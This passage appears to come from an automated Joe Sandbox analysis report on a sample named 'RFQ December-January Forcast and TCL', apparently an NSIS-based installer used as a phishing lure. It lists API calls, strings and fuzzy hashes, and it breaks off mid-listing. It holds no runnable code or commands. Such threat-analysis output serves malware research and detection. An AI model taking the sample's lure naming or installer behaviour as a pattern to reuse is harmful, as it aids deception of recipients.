                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                            • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                              • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                              • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                            • String ID: %ls=%ls$NUL$[Rename]
                                                                                                            • API String ID: 222337774-899692902
                                                                                                            • Opcode ID: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                            • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                            • Opcode Fuzzy Hash: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                            • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                            • lstrcmpiW.KERNEL32(00432EA0,0042D268,00000000,?,?), ref: 0040471B
                                                                                                            • lstrcatW.KERNEL32(?,00432EA0), ref: 00404727
                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                              • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                              • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                              • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                              • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                              • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                              • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                              • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                              • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: A
                                                                                                            • API String ID: 2624150263-3554254475
                                                                                                            • Opcode ID: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                            • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                            • Opcode Fuzzy Hash: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                            • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                              • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                              • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                            Strings
                                                                                                            • Inst, xrefs: 00402ED3
                                                                                                            • (*B, xrefs: 00402E7C
                                                                                                            • Error launching installer, xrefs: 00402E3E
                                                                                                            • Null, xrefs: 00402EE5
                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                                                                            • soft, xrefs: 00402EDC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                            • String ID: (*B$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                            • API String ID: 4283519449-2478819026
                                                                                                            • Opcode ID: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                            • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                            • Opcode Fuzzy Hash: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                            • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD
                                                                                                            APIs
                                                                                                            • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040613A
                                                                                                            • GetSystemDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061B8
                                                                                                            • GetWindowsDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061CB
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                            • SHGetPathFromIDListW.SHELL32(?,00432EA0), ref: 00406215
                                                                                                            • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                            • lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                            • lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040629E
                                                                                                            Strings
                                                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406186
                                                                                                            • \Microsoft\Internet Explorer\Quick Launch, xrefs: 0040623E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                            • API String ID: 900638850-730719616
                                                                                                            • Opcode ID: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                            • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                            • Opcode Fuzzy Hash: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                            • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountTick$wsprintf
                                                                                                            • String ID: jA$ jA$... %d%%
                                                                                                            • API String ID: 551687249-2167919867
                                                                                                            • Opcode ID: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                            • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                            • Opcode Fuzzy Hash: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                            • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                            • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                            • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                            • GetSysColor.USER32(?), ref: 004041E4
                                                                                                            • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                            • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                            • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                            • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                            • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                            APIs
                                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                              • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                            • String ID: 9
                                                                                                            • API String ID: 163830602-2366072709
                                                                                                            • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                            • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                            • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                            • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                            • lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                            • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
                                                                                                            • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 2531174081-0
                                                                                                            • Opcode ID: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                            • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                            • Opcode Fuzzy Hash: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                            • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                            • GetMessagePos.USER32 ref: 00404AA1
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                            • String ID: f
                                                                                                            • API String ID: 41195575-1993550816
                                                                                                            • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                            • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                            • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                            • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                            • MulDiv.KERNEL32(?,00000064,?), ref: 00402D4D
                                                                                                            • wsprintfW.USER32 ref: 00402D5D
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                            Strings
                                                                                                            • verifying installer: %d%%, xrefs: 00402D57
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                            • String ID: verifying installer: %d%%
                                                                                                            • API String ID: 1451636040-82062127
                                                                                                            • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                            • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                            • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                            • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2667972263-0
                                                                                                            • Opcode ID: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
                                                                                                            • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                                                                                                            • Opcode Fuzzy Hash: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
                                                                                                            • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                                                                                                            APIs
                                                                                                            • CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                            • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                            • CharNextW.USER32(0040A300,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                            • CharPrevW.USER32(0040A300,0040A300,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: *?|<>/":
                                                                                                            • API String ID: 589700163-165019052
                                                                                                            • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                            • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                            • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                            • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                            APIs
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017A8
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017CD
                                                                                                              • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                              • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                              • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                              • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
                                                                                                              • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID:
                                                                                                            • API String ID: 1941528284-0
                                                                                                            • Opcode ID: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                            • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                            • Opcode Fuzzy Hash: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                            • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
